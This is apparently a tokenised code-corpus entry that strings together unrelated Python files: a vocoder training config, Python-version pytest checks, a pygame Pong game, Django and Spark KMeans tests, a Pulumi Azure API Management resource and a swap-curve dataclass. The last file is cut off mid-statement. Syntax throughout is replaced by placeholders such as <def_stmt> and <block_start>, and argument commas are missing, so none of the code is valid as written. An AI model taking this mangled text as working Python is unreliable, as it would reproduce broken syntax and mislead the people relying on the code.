tag=""<line_sep>min_db=-115<line_sep>num_mels=128<line_sep>n_fft=2048<line_sep>hop_length=441<line_sep>win_size=<none><line_sep>sample_rate=44100<line_sep>frame_shift_ms=<none><line_sep>trim_fft_size=512<line_sep>trim_hop_size=128<line_sep>trim_top_db=23<line_sep>signal_normalization=<true><line_sep>allow_clipping_in_normalization=<true><line_sep>symmetric_mels=<true><line_sep>max_abs_value=4.0<line_sep>preemphasis=0.85<line_sep>min_level_db=-100<line_sep>ref_level_db=20<line_sep>fmin=50<line_sep>fmax=22000<line_sep>power=1.5<line_sep>griffin_lim_iters=60<line_sep>rescale=<false><line_sep>rescaling_max=0.95<line_sep>trim_silence=<false><line_sep>clip_mels_length=<true><line_sep>max_mel_frames=2000<line_sep>mel_win=128<line_sep>batch_size=24<line_sep>g_learning_rate=0.001<line_sep>d_learning_rate=0.001<line_sep>warmup_steps=100000<line_sep>decay_learning_rate=0.5<line_sep>exponential_moving_average=<true><line_sep>ema_decay=0.99<line_sep>reset_opt=<false><line_sep>reset_g_opt=<false><line_sep>reset_d_opt=<false><line_sep>local_condition_dim=128<line_sep>lambda_update_G=1<line_sep>multiscale_D=3<line_sep>lambda_adv=4.0<line_sep>lambda_fm_loss=0.0<line_sep>lambda_sc_loss=5.0<line_sep>lambda_mag_loss=5.0<line_sep>lambda_mel_loss=50.0<line_sep>use_mle_loss=<false><line_sep>lambda_mle_loss=5.0<line_sep>lambda_freq_loss=2.0<line_sep>lambda_energy_loss=100.0<line_sep>lambda_t_loss=200.0<line_sep>lambda_phase_loss=100.0<line_sep>lambda_f0_loss=1.0<line_sep>use_elu=<false><line_sep>de_preem=<false># train
up_org=<false><line_sep>use_one=<true><line_sep>use_small_D=<false><line_sep>use_condnet=<true><line_sep>use_depreem=<false># inference
use_msd=<false><line_sep>model_type="tfgan"# or bytewave, frame level vocoder using istft
use_hjcud=<false><line_sep>no_skip=<false><line_sep>out_channels=1<line_sep>use_postnet=<false># wn in postnet
use_wn=<false># wn in resstack
up_type="transpose"<line_sep>use_smooth=<false><line_sep>use_drop=<false><line_sep>use_shift_scale=<false><line_sep>use_gcnn=<false><line_sep>resstack_depth=[6 6 6 6]<line_sep>kernel_size=[3 3 3 3]<line_sep>channels=512<line_sep>use_f0_loss=<false><line_sep>use_sine=<false><line_sep>use_cond_rnn=<false><line_sep>use_rnn=<false><line_sep>f0_step=120<line_sep>use_lowfreq_loss=<false><line_sep>lambda_lowfreq_loss=1.0<line_sep>use_film=<false><line_sep>use_mb_mr_gan=<false><line_sep>use_mssl=<false><line_sep>use_ml_gan=<false><line_sep>use_mb_gan=<true><line_sep>use_mpd=<false><line_sep>use_spec_gan=<true><line_sep>use_rwd=<false><line_sep>use_mr_gan=<true><line_sep>use_pqmf_rwd=<false><line_sep>no_sine=<false><line_sep>use_frame_mask=<false><line_sep>lambda_var_loss=0.0<line_sep>discriminator_train_start_steps=40000# 80k
aux_d_train_start_steps=40000# 100k
rescale_out=0.40<line_sep>use_dist=<true><line_sep>dist_backend="nccl"<line_sep>dist_url="tcp://localhost:12345"<line_sep>world_size=1<line_sep>mel_weight_torch=torch.tensor([19.40951426 19.94047336 20.4859038 21.04629067 21.62194148 22.21335214 22.8210215 23.44529231 24.08660962 24.74541882 25.42234287 26.11770576 26.83212784 27.56615283 28.32007747 29.0947679 29.89060111 30.70832636 31.54828121 32.41121487 33.29780773 34.20865341 35.14437675 36.1056621 37.09332763 38.10795802 39.15039691 40.22119881 41.32154931 42.45172373 43.61293329 44.80609379 46.031602 47.29070223 48.58427549 49.91327905 51.27863232 52.68119708 54.1222372 55.60274206 57.12364703 58.68617876 60.29148652 61.94081306 63.63501986 65.37562658 67.16408954 69.00109084 70.88850318 72.82736101 74.81985537 76.86654792 78.96885475 81.12900906 83.34840929 85.62810662 87.97005418 90.37689804 92.84887686 95.38872881 97.99777002 100.67862715 103.43232942 106.26140638 109.16827015 112.15470471 115.22184756 118.37439245 121.6122689 124.93877158 128.35661454 131.86761321 135.47417938 139.18059494 142.98713744 146.89771854 150.91684347 155.0446638 159.28614648 163.64270198 168.12035831 172.71749158 177.44220154 182.29556933 187.28286676 192.40502126 197.6682721 203.07516896 208.63088733 214.33770931 220.19910108 226.22363072 232.41087124 238.76803591 245.30079083 252.01064464 258.90261676 265.98474 273.26010248 280.73496362 288.41440094 296.30489752 304.41180337 312.7377183 321.28877878 330.07870237 339.10812951 348.38276173 357.91393924 367.70513992 377.76413924 388.09467408 398.70920178 409.61813793 420.81980127 432.33215467 444.16083117 456.30919947 468.78589276 481.61325588 494.78824596 508.31969844 522.2238331 536.51163441 551.18859414 566.26142988 581.75006061 597.66210737 ])<line_sep>x_orig=np.linspace(1 mel_weight_torch.shape[0] num=mel_weight_torch.shape[0])<line_sep>x_orig_torch=torch.linspace(1 mel_weight_torch.shape[0] steps=mel_weight_torch.shape[0])<line_sep>@classmethod<def_stmt>get_mel_weight cls percent=1 a=18.8927416350036 b=0.0269863588184314<block_start>b=percent<times>b<def_stmt>func a b x<block_start><return>a<times>np.exp(b<times>x)<block_end><return>func(a b Config.x_orig)<block_end>@classmethod<def_stmt>get_mel_weight_torch cls percent=1 a=18.8927416350036 b=0.0269863588184314<block_start>b=percent<times>b<def_stmt>func a b x<block_start><return>a<times>torch.exp(b<times>x)<block_end><return>func(a b Config.x_orig_torch)<block_end><block_end> |
<import_stmt>subprocess<import_stmt>pytest<import_from_stmt>build.platform.python.tests testlib<line_sep>PYTHON_VERSIONS=["2.7" "3.4" "3.5" "3.6"]# 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver" PYTHON_VERSIONS)<def_stmt>test_version_matched pyver<block_start>testlib.check_python_version(pyver)<block_end>@pytest.mark.parametrize("pyver" PYTHON_VERSIONS)<def_stmt>test_python_max_unicode_bytes pyver<block_start>cmd=[testlib.get_python_bin(pyver) '-c' 'import sys; print(sys.maxunicode)']<line_sep>maxunicode=subprocess.check_output(cmd stderr=subprocess.STDOUT).decode('utf-8')<assert_stmt>int(maxunicode)<g>65535 "Found UCS2 build"<block_end>@pytest.mark.parametrize("pyver" PYTHON_VERSIONS)<def_stmt>test_python_imports pyver<block_start>imports={"2.7":['pkg_resources'] "3.4":[] "3.5":['pkg_resources'] "3.6":[] }<for_stmt>imp imports[pyver]<block_start>subprocess.check_call([testlib.get_python_bin(pyver) '-c' 'import '+imp])<block_end><block_end> |
<import_stmt>pygame<import_from_stmt>pygame.locals *<import_from_stmt>paddle Paddle<import_from_stmt>ball Ball<import_from_stmt>inputs handle_events handle_input<import_from_stmt>constants SCREEN_WIDTH SCREEN_HEIGHT WHITE RED<line_sep>ball=<none><line_sep>left_paddle=<none><line_sep>right_paddle=<none><line_sep>pygame.init()<line_sep>screen=pygame.display.set_mode((SCREEN_WIDTH SCREEN_HEIGHT))<line_sep>pygame.display.set_caption("Python PONG")<line_sep>clock=pygame.time.Clock()<line_sep>done=[<false>]<line_sep>is_game_over=[<false>]<def_stmt>setup_game <block_start><global>ball<line_sep><global>left_paddle<line_sep><global>right_paddle<line_sep>ball=Ball((SCREEN_WIDTH<floordiv>2 SCREEN_HEIGHT<floordiv>2))<line_sep>left_paddle=Paddle()<line_sep>right_paddle=Paddle()<line_sep>right_paddle.rect.x=SCREEN_WIDTH-right_paddle.rect.width<block_end><def_stmt>draw_game_over <block_start>font=pygame.font.Font("freesansbold.ttf" 32)<line_sep>game_over=font.render("GAME OVER" <true> RED)<line_sep>game_over_rect=game_over.get_rect()<line_sep>game_over_rect.center=(SCREEN_WIDTH<floordiv>2 SCREEN_HEIGHT<floordiv>2)<line_sep>screen.blit(game_over game_over_rect)<block_end><def_stmt>draw_game <block_start>left_paddle.draw(screen)<line_sep>right_paddle.draw(screen)<line_sep>ball.draw(screen)<block_end><def_stmt>draw <block_start>screen.fill(WHITE)<if_stmt>is_game_over[0]<block_start>draw_game_over()<block_end><else_stmt><block_start>draw_game()<block_end>pygame.display.flip()<block_end><def_stmt>update <block_start>handle_events(done)<if_stmt><not>is_game_over[0]<block_start>handle_input(left_paddle right_paddle)<line_sep>ball.update(left_paddle right_paddle is_game_over)<block_end><block_end>setup_game()<while_stmt><not>done[0]<block_start>clock.tick(30)<line_sep>update()<line_sep>draw()<block_end>pygame.quit()<line_sep> |
<import_from_stmt>django.test TestCase<import_from_stmt>django.contrib.auth.models Group<import_from_stmt>hs_access_control.models PrivilegeCodes<import_from_stmt>hs_core hydroshare<import_from_stmt>hs_core.testing MockIRODSTestCaseMixin<import_from_stmt>hs_access_control.tests.utilities global_reset is_equal_to_as_set<class_stmt>T09GroupPublic(MockIRODSTestCaseMixin TestCase)<block_start><def_stmt>setUp self<block_start>super(T09GroupPublic self).setUp()<line_sep>global_reset()<line_sep>self.group,_=Group.objects.get_or_create(name='Hydroshare Author')<line_sep>self.admin=hydroshare.create_account('<EMAIL>' username='admin' first_name='administrator' last_name='couch' superuser=<true> groups=[])<line_sep>self.dog=hydroshare.create_account('<EMAIL>' username='dog' first_name='<NAME>' last_name='last_name_dog' superuser=<false> groups=[])<line_sep>self.squirrels=hydroshare.create_resource(resource_type='GenericResource' owner=self.dog title='all about chasing squirrels' metadata=[] )<line_sep>self.holes=hydroshare.create_resource(resource_type='GenericResource' owner=self.dog title='all about storing bones in holes' metadata=[] )<line_sep># dog owns canines group
self.canines=self.dog.uaccess.create_group(title='canines' description="We are the canines")<block_end><def_stmt>test_public_resources self<block_start>""" public resources contain those resources that are public and discoverable """<line_sep>res=self.canines.gaccess.public_resources<line_sep>self.assertTrue(is_equal_to_as_set(res []))<line_sep>self.dog.uaccess.share_resource_with_group(self.squirrels self.canines PrivilegeCodes.VIEW)<line_sep>self.dog.uaccess.share_resource_with_group(self.holes self.canines PrivilegeCodes.VIEW)<line_sep>res=self.canines.gaccess.public_resources<line_sep>self.assertTrue(is_equal_to_as_set(res []))<line_sep>self.holes.raccess.public=<true><line_sep>self.holes.raccess.discoverable=<true><line_sep>self.holes.raccess.save()# this avoids regular requirements for "public"
res=self.canines.gaccess.public_resources<line_sep>self.assertTrue(is_equal_to_as_set(res [self.holes]))<for_stmt>r res<block_start>self.assertEqual(r.public r.raccess.public)<line_sep>self.assertEqual(r.discoverable r.raccess.discoverable)<line_sep>self.assertEqual(r.published r.raccess.published)<line_sep>self.assertEqual(r.group_name self.canines.name)<line_sep>self.assertEqual(r.group_id self.canines.id)<block_end>self.squirrels.raccess.discoverable=<true><line_sep>self.squirrels.raccess.save()<line_sep>res=self.canines.gaccess.public_resources<line_sep>self.assertTrue(is_equal_to_as_set(res [self.holes self.squirrels]))<for_stmt>r res<block_start>self.assertEqual(r.public r.raccess.public)<line_sep>self.assertEqual(r.discoverable r.raccess.discoverable)<line_sep>self.assertEqual(r.published r.raccess.published)<line_sep>self.assertEqual(r.group_name self.canines.name)<line_sep>self.assertEqual(r.group_id self.canines.id)<block_end><block_end><block_end> |
<import_from_stmt>.grid_attention_example run_grid_attention_example<import_from_stmt>.region_attention_example run_region_attention_example<line_sep> |
<import_stmt>numpy<as>np<import_stmt>pytest<import_from_stmt>tensorflow.keras losses<as>losses_module<import_from_stmt>tensorflow.keras metrics<as>metrics_module<import_from_stmt>scikeras.utils loss_name metric_name<class_stmt>CustomLoss(losses_module.Loss)<block_start><pass><block_end><class_stmt>CustomMetric(metrics_module.AUC)<block_start><pass><block_end>@pytest.mark.parametrize("obj" ["categorical_crossentropy" "CategoricalCrossentropy" losses_module.categorical_crossentropy losses_module.CategoricalCrossentropy losses_module.CategoricalCrossentropy() ] )<def_stmt>test_loss_invariance obj<block_start>"""Test to make sure loss_name returns same string no matter which object
is passed (str, function, class, type)"""<assert_stmt>loss_name(obj)<eq>"categorical_crossentropy"<block_end>@pytest.mark.parametrize("obj" [CustomLoss CustomLoss()])<def_stmt>test_custom_loss obj<block_start><assert_stmt>loss_name(obj)<eq>"custom_loss"<block_end>@pytest.mark.parametrize("obj" ["categorical_crossentropy" "CategoricalCrossentropy" metrics_module.categorical_crossentropy metrics_module.CategoricalCrossentropy metrics_module.CategoricalCrossentropy() ] )<def_stmt>test_metric_invariance obj<block_start>"""Test to make sure same metric returned no matter which object passed"""<assert_stmt>metric_name(obj)<eq>"categorical_crossentropy"<block_end>@pytest.mark.parametrize("loss" [object() object list()])<def_stmt>test_loss_types loss<block_start><with_stmt>pytest.raises(TypeError match="``loss`` must be a")<block_start>loss_name(loss)<block_end><block_end><def_stmt>test_unknown_loss_raises <block_start><with_stmt>pytest.raises(ValueError match="Unknown loss function")<block_start>loss_name("unknown_loss")<block_end><block_end>@pytest.mark.parametrize("obj" [object() object list()])<def_stmt>test_metric_types obj<block_start><with_stmt>pytest.raises(TypeError match="``metric`` must be a")<block_start>metric_name(obj)<block_end><block_end><def_stmt>test_unknown_metric <block_start><with_stmt>pytest.raises(ValueError match="Unknown metric function")<block_start>metric_name("unknown_metric")<block_end><block_end>@pytest.mark.parametrize("metric" [CustomMetric CustomMetric()])<def_stmt>test_custom_metric metric<block_start><assert_stmt>metric_name(metric)<eq>"custom_metric"<block_end> |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
<import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<line_sep>__all__=['ProductApiArgs' 'ProductApi']<line_sep>@pulumi.input_type<class_stmt>ProductApiArgs<block_start><def_stmt>__init__ __self__ * api_management_name:pulumi.Input[str] api_name:pulumi.Input[str] product_id:pulumi.Input[str] resource_group_name:pulumi.Input[str]<block_start>"""
The set of arguments for constructing a ProductApi resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep>pulumi.set(__self__ "api_management_name" api_management_name)<line_sep>pulumi.set(__self__ "api_name" api_name)<line_sep>pulumi.set(__self__ "product_id" product_id)<line_sep>pulumi.set(__self__ "resource_group_name" resource_group_name)<block_end>@property@pulumi.getter(name="apiManagementName")<def_stmt>api_management_name self<arrow>pulumi.Input[str]<block_start>"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_management_name")<block_end>@api_management_name.setter<def_stmt>api_management_name self value:pulumi.Input[str]<block_start>pulumi.set(self "api_management_name" value)<block_end>@property@pulumi.getter(name="apiName")<def_stmt>api_name self<arrow>pulumi.Input[str]<block_start>"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_name")<block_end>@api_name.setter<def_stmt>api_name self value:pulumi.Input[str]<block_start>pulumi.set(self "api_name" value)<block_end>@property@pulumi.getter(name="productId")<def_stmt>product_id self<arrow>pulumi.Input[str]<block_start>"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "product_id")<block_end>@product_id.setter<def_stmt>product_id self value:pulumi.Input[str]<block_start>pulumi.set(self "product_id" value)<block_end>@property@pulumi.getter(name="resourceGroupName")<def_stmt>resource_group_name self<arrow>pulumi.Input[str]<block_start>"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "resource_group_name")<block_end>@resource_group_name.setter<def_stmt>resource_group_name self value:pulumi.Input[str]<block_start>pulumi.set(self "resource_group_name" value)<block_end><block_end>@pulumi.input_type<class_stmt>_ProductApiState<block_start><def_stmt>__init__ __self__ * api_management_name:Optional[pulumi.Input[str]]=<none> api_name:Optional[pulumi.Input[str]]=<none> product_id:Optional[pulumi.Input[str]]=<none> resource_group_name:Optional[pulumi.Input[str]]=<none><block_start>"""
Input properties used for looking up and filtering ProductApi resources.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<if_stmt>api_management_name<is><not><none><block_start>pulumi.set(__self__ "api_management_name" api_management_name)<block_end><if_stmt>api_name<is><not><none><block_start>pulumi.set(__self__ "api_name" api_name)<block_end><if_stmt>product_id<is><not><none><block_start>pulumi.set(__self__ "product_id" product_id)<block_end><if_stmt>resource_group_name<is><not><none><block_start>pulumi.set(__self__ "resource_group_name" resource_group_name)<block_end><block_end>@property@pulumi.getter(name="apiManagementName")<def_stmt>api_management_name self<arrow>Optional[pulumi.Input[str]]<block_start>"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_management_name")<block_end>@api_management_name.setter<def_stmt>api_management_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "api_management_name" value)<block_end>@property@pulumi.getter(name="apiName")<def_stmt>api_name self<arrow>Optional[pulumi.Input[str]]<block_start>"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_name")<block_end>@api_name.setter<def_stmt>api_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "api_name" value)<block_end>@property@pulumi.getter(name="productId")<def_stmt>product_id self<arrow>Optional[pulumi.Input[str]]<block_start>"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "product_id")<block_end>@product_id.setter<def_stmt>product_id self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "product_id" value)<block_end>@property@pulumi.getter(name="resourceGroupName")<def_stmt>resource_group_name self<arrow>Optional[pulumi.Input[str]]<block_start>"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "resource_group_name")<block_end>@resource_group_name.setter<def_stmt>resource_group_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "resource_group_name" value)<block_end><block_end><class_stmt>ProductApi(pulumi.CustomResource)<block_start>@overload<def_stmt>__init__ __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> api_management_name:Optional[pulumi.Input[str]]=<none> api_name:Optional[pulumi.Input[str]]=<none> product_id:Optional[pulumi.Input[str]]=<none> resource_group_name:Optional[pulumi.Input[str]]=<none> __props__=<none><block_start>"""
Manages an API Management API Assignment to a Product.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_service = azure.apimanagement.get_service(name="example-api",
resource_group_name="example-resources")
example_api = azure.apimanagement.get_api(name="search-api",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name,
revision="2")
example_product = azure.apimanagement.get_product(product_id="my-product",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
example_product_api = azure.apimanagement.ProductApi("exampleProductApi",
api_name=example_api.name,
product_id=example_product.product_id,
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
```
## Import
API Management Product API's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/productApi:ProductApi example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/service1/products/exampleId/apis/apiId
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep><ellipsis><block_end>@overload<def_stmt>__init__ __self__ resource_name:str args:ProductApiArgs opts:Optional[pulumi.ResourceOptions]=<none><block_start>"""
Manages an API Management API Assignment to a Product.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_service = azure.apimanagement.get_service(name="example-api",
resource_group_name="example-resources")
example_api = azure.apimanagement.get_api(name="search-api",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name,
revision="2")
example_product = azure.apimanagement.get_product(product_id="my-product",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
example_product_api = azure.apimanagement.ProductApi("exampleProductApi",
api_name=example_api.name,
product_id=example_product.product_id,
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
```
## Import
API Management Product API's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/productApi:ProductApi example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/service1/products/exampleId/apis/apiId
```
:param str resource_name: The name of the resource.
:param ProductApiArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""<line_sep><ellipsis><block_end><def_stmt>__init__ __self__ resource_name:str *args **kwargs<block_start>resource_args,opts=_utilities.get_resource_args_opts(ProductApiArgs pulumi.ResourceOptions *args **kwargs)<if_stmt>resource_args<is><not><none><block_start>__self__._internal_init(resource_name opts **resource_args.__dict__)<block_end><else_stmt><block_start>__self__._internal_init(resource_name *args **kwargs)<block_end><block_end><def_stmt>_internal_init __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> api_management_name:Optional[pulumi.Input[str]]=<none> api_name:Optional[pulumi.Input[str]]=<none> product_id:Optional[pulumi.Input[str]]=<none> resource_group_name:Optional[pulumi.Input[str]]=<none> __props__=<none><block_start><if_stmt>opts<is><none><block_start>opts=pulumi.ResourceOptions()<block_end><if_stmt><not>isinstance(opts pulumi.ResourceOptions)<block_start><raise>TypeError('Expected resource options to be a ResourceOptions instance')<block_end><if_stmt>opts.version<is><none><block_start>opts.version=_utilities.get_version()<block_end><if_stmt>opts.id<is><none><block_start><if_stmt>__props__<is><not><none><block_start><raise>TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')<block_end>__props__=ProductApiArgs.__new__(ProductApiArgs)<if_stmt>api_management_name<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'api_management_name'")<block_end>__props__.__dict__["api_management_name"]=api_management_name<if_stmt>api_name<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'api_name'")<block_end>__props__.__dict__["api_name"]=api_name<if_stmt>product_id<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'product_id'")<block_end>__props__.__dict__["product_id"]=product_id<if_stmt>resource_group_name<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'resource_group_name'")<block_end>__props__.__dict__["resource_group_name"]=resource_group_name<block_end>super(ProductApi __self__).__init__('azure:apimanagement/productApi:ProductApi' resource_name __props__ opts)<block_end>@staticmethod<def_stmt>get resource_name:str id:pulumi.Input[str] opts:Optional[pulumi.ResourceOptions]=<none> api_management_name:Optional[pulumi.Input[str]]=<none> api_name:Optional[pulumi.Input[str]]=<none> product_id:Optional[pulumi.Input[str]]=<none> resource_group_name:Optional[pulumi.Input[str]]=<none><arrow>'ProductApi'<block_start>"""
Get an existing ProductApi resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep>opts=pulumi.ResourceOptions.merge(opts pulumi.ResourceOptions(id=id))<line_sep>__props__=_ProductApiState.__new__(_ProductApiState)<line_sep>__props__.__dict__["api_management_name"]=api_management_name<line_sep>__props__.__dict__["api_name"]=api_name<line_sep>__props__.__dict__["product_id"]=product_id<line_sep>__props__.__dict__["resource_group_name"]=resource_group_name<line_sep><return>ProductApi(resource_name opts=opts __props__=__props__)<block_end>@property@pulumi.getter(name="apiManagementName")<def_stmt>api_management_name self<arrow>pulumi.Output[str]<block_start>"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_management_name")<block_end>@property@pulumi.getter(name="apiName")<def_stmt>api_name self<arrow>pulumi.Output[str]<block_start>"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_name")<block_end>@property@pulumi.getter(name="productId")<def_stmt>product_id self<arrow>pulumi.Output[str]<block_start>"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "product_id")<block_end>@property@pulumi.getter(name="resourceGroupName")<def_stmt>resource_group_name self<arrow>pulumi.Output[str]<block_start>"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "resource_group_name")<block_end><block_end> |
_base_=['../_base_/models/flownet2/flownet2sd.py' '../_base_/datasets/chairssdhom_384x448.py' '../_base_/schedules/schedule_s_long.py' '../_base_/default_runtime.py']<line_sep> |
<import_from_stmt>gazette.spiders.base.fecam FecamGazetteSpider<class_stmt>ScSaoDomingosSpider(FecamGazetteSpider)<block_start>name="sc_sao_domingos"<line_sep>FECAM_QUERY="cod_entidade:244"<line_sep>TERRITORY_ID="4216107"<block_end> |
<import_stmt>numpy<as>np<import_from_stmt>sklearn.cluster KMeans<import_from_stmt>splearn.cluster SparkKMeans<import_from_stmt>splearn.utils.testing SplearnTestCase assert_array_almost_equal<class_stmt>TestKMeans(SplearnTestCase)<block_start><def_stmt>test_same_centroids self<block_start>X,y,X_rdd=self.make_blobs(centers=4 n_samples=200000)<line_sep>local=KMeans(n_clusters=4 init='k-means++' random_state=42)<line_sep>dist=SparkKMeans(n_clusters=4 init='k-means++' random_state=42)<line_sep>local.fit(X)<line_sep>dist.fit(X_rdd)<line_sep>local_centers=np.sort(local.cluster_centers_ axis=0)<line_sep>dist_centers=np.sort(dist.cluster_centers_ axis=0)<line_sep>assert_array_almost_equal(local_centers dist_centers decimal=4)<block_end><block_end> |
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities and data structures for swap curve construction."""<import_from_stmt>tf_quant_finance types<import_from_stmt>tf_quant_finance utils<line_sep>__all__=['SwapCurveBuilderResult']<line_sep>@utils.dataclass<class_stmt>SwapCurveBuilderResult<block_start>"""Swap curve calibration results.
Attributes:
times: Rank 1 real `Tensor`. Times for the computed rates.
rates: Rank 1 `Tensor` of the same dtype as `times`. The inferred zero
rates.
discount_factors: Rank 1 `Tensor` of the same dtype as `times`. The inferred
discount factors.
initial_rates: Rank 1 `Tensor` of the same dtype as `times`. The initial
guess for the rates.
converged: Scalar boolean `Tensor`. Whether the procedure converged.
failed: Scalar boolean `Tensor`. Whether the procedure failed.
iterations: Scalar int32 `Tensor`. Number of iterations performed.
objective_value: Scalar real `Tensor`. The objective function at the optimal
soultion.
"""<line_sep>times:types.RealTensor<line_sep>rates:types.RealTensor<line_sep>discount_factors:types.RealTensor<line_sep>initial_rates:types.RealTensor<line_sep>converged:types.BoolTensor<line_sep>failed:types.BoolTensor<line_sep>iterations:types.IntTensor<line_sep>objective_value:types.RealTensor<block_end> |
<def_stmt>kw1 <block_start><pass><block_end> |
<import_from_stmt>django.db models<import_from_stmt>mayan.apps.testing.tests.base BaseTestCase<import_from_stmt>..classes QuerysetParametersSerializer<class_stmt>QuerysetParametersSerializerTestCase(BaseTestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.TestModelParent=self._create_test_model(model_name='TestModelParent')<line_sep>self.TestModelChild=self._create_test_model(fields={'parent':models.ForeignKey(on_delete=models.CASCADE related_name='children' to='TestModelParent')} model_name='TestModelChild')<line_sep>self._test_object_parent=self.TestModelParent.objects.create()<line_sep>self.TestModelChild.objects.create(parent_id=self._test_object_parent.pk)<block_end><def_stmt>_assertQuerysetEqual self<block_start>rebuilt_items=list(map(repr self.queryset_rebuilt))<line_sep>self.assertQuerysetEqual(qs=self.queryset_original values=rebuilt_items)<block_end><def_stmt>test_without_kwargs self<block_start>self.queryset_original=self.TestModelParent.objects.all()<line_sep>decomposed_queryset=QuerysetParametersSerializer.decompose(_model=self.TestModelParent _method_name='all')<line_sep>self.queryset_rebuilt=QuerysetParametersSerializer.rebuild(decomposed_queryset=decomposed_queryset)<line_sep>self._assertQuerysetEqual()<block_end><def_stmt>test_foreign_key_model self<block_start>self.queryset_original=self.TestModelChild.objects.all()<line_sep>decomposed_queryset=QuerysetParametersSerializer.decompose(_model=self.TestModelChild _method_name='filter' parent=self._test_object_parent)<line_sep>self.queryset_rebuilt=QuerysetParametersSerializer.rebuild(decomposed_queryset=decomposed_queryset)<line_sep>self._assertQuerysetEqual()<block_end><def_stmt>test_foreign_key_model_id_query self<block_start>self.queryset_original=self.TestModelChild.objects.all()<line_sep>decomposed_queryset=QuerysetParametersSerializer.decompose(_model=self.TestModelChild 